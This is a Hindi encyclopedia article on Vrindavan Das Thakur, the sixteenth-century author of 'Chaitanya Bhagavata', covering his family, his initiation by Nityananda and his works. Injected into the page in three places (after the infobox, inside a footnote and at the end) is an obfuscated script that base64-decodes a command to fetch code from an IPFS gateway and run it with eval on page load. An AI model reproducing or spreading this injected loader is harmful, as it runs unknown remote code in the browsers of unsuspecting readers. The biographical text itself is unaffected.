वृन्दावनदास ठाकुर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
वृन्दावनदास ठाकुर
वृन्दावनदास ठाकुर
पूरा नाम वृन्दावनदास ठाकुर
जन्म 1507 ई.
जन्म भूमि नवद्वीप, पश्चिम बंगाल
मृत्यु 1589 ई.
गुरु श्रीमन नित्यानंद प्रभु
कर्म भूमि पश्चिम बंगाल, भारत
मुख्य रचनाएँ 'चैतन्य भागवत', 'श्रीनित्यानंद चरितामृत', 'आनंदलहरी', 'तत्वसार', 'तत्वविलास', 'भक्तिचिंतामणि'।
भाषा बांग्ला
नागरिकता भारतीय
संबंधित लेख चैतन्य महाप्रभु, गौड़ीय सम्प्रदाय, चैतन्य चरितामृत, चैतन्य भागवत
अन्य जानकारी वृन्दावनदास ठाकुर ने 'चैतन्य मंगल' ग्रंथ लिखा है, जो बाद में 'चैतन्य भागवत' नाम से प्रसिद्ध हुआ। कृष्णदास कविराज ने अपने ग्रंथ 'चैतन्य चरितामृत' में इसकी बड़ी प्रशंसा की है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वृन्दावनदास ठाकुर (अंग्रेज़ी: Vrindavana Dasa Thakura, जन्म: 1507 ई., पश्चिम बंगाल; मृत्यु: 1589 ई.) बंगला भाषा में 'चैतन्य भागवत' नामक प्रसिद्ध ग्रंथ के रचयिता थे। यह ग्रन्थ चैतन्य महाप्रभु का जीवनचरित है। यह बंगला भाषा का आदि काव्य ग्रंथ माना जाता है।

जन्म

श्री हट्टनिवासी श्रीजलधर वैदिक पण्डित अपनी पत्नि सहित पश्चिम बंगाल के नवद्वीप में आकर बस गये थे। उनके पाँच पुत्र थे- नलिन, श्रीवास, श्रीराम, श्रीपति एवं श्रीनिधि। नलिन एक कन्‍या नारायणी के पिता बनने के बाद कुमारहद में संसार से विदा हो गए। उनके छोटे भाई श्रीवास पण्डित ने नारायणी एवं उनकी माता को अपनी देख-रेख में नवद्वीप में रखा। नारायणी की माता का भी कुछ दिनों में ही परलोक गमन हो गया।[1] वृन्दावनदास ठाकुर का जन्म नवद्वीप में संवत 1582 में नारायणी के गर्भ से हुआ, जो कुमारहद निवासी बैकुंठनाथ ठाकुर की अर्धांगनी थीं। कुछ दिन बाद वृन्दावनदास जी माता के साथ नवद्वीप से कुमारहद लौट आए, जहाँ इनकी माता का शरीरांत हो गया।

वंश परिचय

दैन्‍याभूषण-विभूषित श्री वृन्‍दावनदास ठाकुर ने अपनी रचना 'चैतन्य भागवत' में आत्‍म प्रकाश के भय से कहीं भी अपने वंश-परिचय आदि का उल्‍लेख नहीं किया। एक जगह अपनी माता नारायणी एवं दीक्षागुरु नित्यानन्द प्रभु का परिचय श्री नित्‍यानन्‍द-कथा प्रसंग में अवश्य दिया है-

सर्वशेष भृत्‍य तान वृन्‍दावनदास। अवशेष पात्र-नारायणी-गर्भजात॥[2]

अर्थात "श्रीमन्‍महाप्रभु के उच्छिष्‍ट भोजन की अधिकारिणी श्री नरायणी का पुत्र मैं वृन्‍दावनदास श्री नित्‍यानन्‍द प्रभु का सबसे आखिरी शिष्‍य हूँ अथवा सबसे क्षुद्र शिष्‍य हूँ।"

अनुसंधानकर्ताओं के अभिमतानुसार विशेषत: प्रेमविलासादि के आधार पर श्री ग्रन्‍थकार का संक्षिप्‍त परिचय इस प्रकार प्राप्‍त होता है- कवि श्रीकर्णपूर गोस्‍वामी ने कहा है[3]-

वेदव्‍यासो य एवासीद्दासो वृन्‍दावनोऽधुना।
सखा य: कुसुमापीड: कार्यतस्‍तं समाविशत्॥

अर्थात "पूर्वलीला में जो श्री वेदव्‍यास थे, वही नवद्वीपलीला में श्री वृन्‍दावनदास हुए। वृन्‍दावनदास जो कुसुमापीड नाम का कृष्‍णसखा था, उसने भी कार्यवश इनमें आकर प्रवेश किया है।"[1]

दीक्षा

महान वैष्णव आचार्य वृन्दावनदास ठाकुर, श्रीमन नित्यानंद प्रभु जी के मन्त्र शिष्य थे, जिन्होंने 'श्री चैतन्य भागवत' की रचना की थी। इन्होंने चैतन्य भागवत में भगवान चैतन्य महाप्रभु की विभिन्न लीलाओं का विस्तारपूर्वक वर्णन किया है। 16 वर्ष की आयु में इन्होंने नित्यानंद प्रभु जी से दीक्षा ग्रहण की थी। वे श्रीमन नित्यानंद प्रभु जी के प्रियतम शिष्य थे।

ग्रंथ रचना

वृन्दावनदास ठाकुर ने 'चैतन्य मंगल' नामक ग्रंथ लिखा था, जो बाद में 'चैतन्य भागवत' नाम से प्रसिद्ध हुआ। कृष्णदास कविराज ने अपने ग्रंथ 'चैतन्य चरितामृत' में इसकी बड़ी प्रशंसा की है। कवि कर्णपूर ने वृन्दावनदास को 'वेद व्यास का अवतार' कहा है। अंतिम अवस्था में वृन्दावनदास ठाकुर वृंदावन आये थे।

'चैतन्य भागवत' का वर्णन

वृन्दावनदास ठाकुर की माता श्रीवास पंडित जी के भाई की कन्या थीं। जिस समय भगवान श्री चैतन्य महाप्रभु जी ने श्रीवास पंडित के घर में 'महाभाव प्रकाश' लीला की और वहाँ एकत्रित भक्तों को अपने स्वरूप के दर्शन करवाए, उस समय नारायणी देवी केवल 4 वर्ष की बच्ची थीं। 'चैतन्य भागवत' में इस लीला का वर्णन इस प्रकार है-

"जिस समय गौरांग महाप्रभु जी ने श्रीवास पंडित जी के घर में अपने स्वरूप को प्रकाशित किया, उसी समय महाप्रभु जी ने नारायणी को 'कृष्ण' नाम उच्चारण करने को कहा। नारायणी उस समय मात्र 4 वर्ष की थीं और वह 'कृष्ण-कृष्ण' उच्चारण करती हुई कृष्ण प्रेम में पागल होकर, नेत्रों से अश्रुधारा बहाती हुई पृथ्वी पर गिर पड़ीं।" नारायणी देवी के पुत्र हुए वृन्दावनदास ठाकुर।"

नारायणी को किस प्रकार महाप्रभु जी की कृपा प्राप्त हुई, इसका उल्लेख 'चैतन्य भागवत' में किया गया है-

"नारायणी की भगवान में बहुत निष्ठा थी। वह केवल एक छोटी बच्ची थी, किन्तु स्वयं भगवान श्री चैतन्य महाप्रभु ने श्रीवास पंडित के घर उनकी भतीजी नारायणी को अपना महाप्रसाद देकर विशेष कृपा प्रदान की।"

निश्चित ही यह भगवान चैतन्य महाप्रभु की कृपा थी, जो वृन्दावनदास ठाकुर जी ने नारायणी के गर्भ से जन्म लिया। श्री गौरांग और नित्यानंद जी तो वृन्दावनदास ठाकुर जी का जीवन व प्राण हैं। 'श्रीगौर गणों देश दीपिका' ग्रन्थ में लिखा है कि ब्रज लीला में कृष्ण की स्तन-धात्री अम्बिका की छोटी बहन किलिम्बिका ही नारायणी देवी के रूप में चैतन्य लीला में अवतरित हुईं और अम्बिका श्रीवास पंडित जी की पत्नी मालिनी देवी के रूप में आईं। इस प्रकार अम्बिका और किलिम्बिका, दोनों बहनें पुनः गौरांग महाप्रभु जी की लीला में मालिनी देवी और नारायणी देवी के रूप में अवतरित हुई।[4]

मुख्य रचनाएँ

  1. चैतन्य भागवत
  2. श्रीनित्यानंद चरितामृत
  3. आनंदलहरी
  4. तत्वसार
  5. तत्वविलास
  6. भक्तिचिंतामणि


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 श्री चैतन्यभागवत |प्रकाशक: श्रीहरिनाम संकीर्तन मण्डल, श्रीधाम वृन्दावन |संकलन: भारतकोश पुस्तकालय |संपादन: श्री श्यामदास |पृष्ठ संख्या: 6,8,9 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. श्री चैतन्य भागवत 3|6|121
  3. श्रीगौरगणोद्देशदीपिका, 106
  4. श्रीकृष्ण की प्रेमपूर्वक सेवा करना ही भक्ति है (हिन्दी) सबके गुरु (ब्लॉग)। अभिगमन तिथि: 16 मई, 2015।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>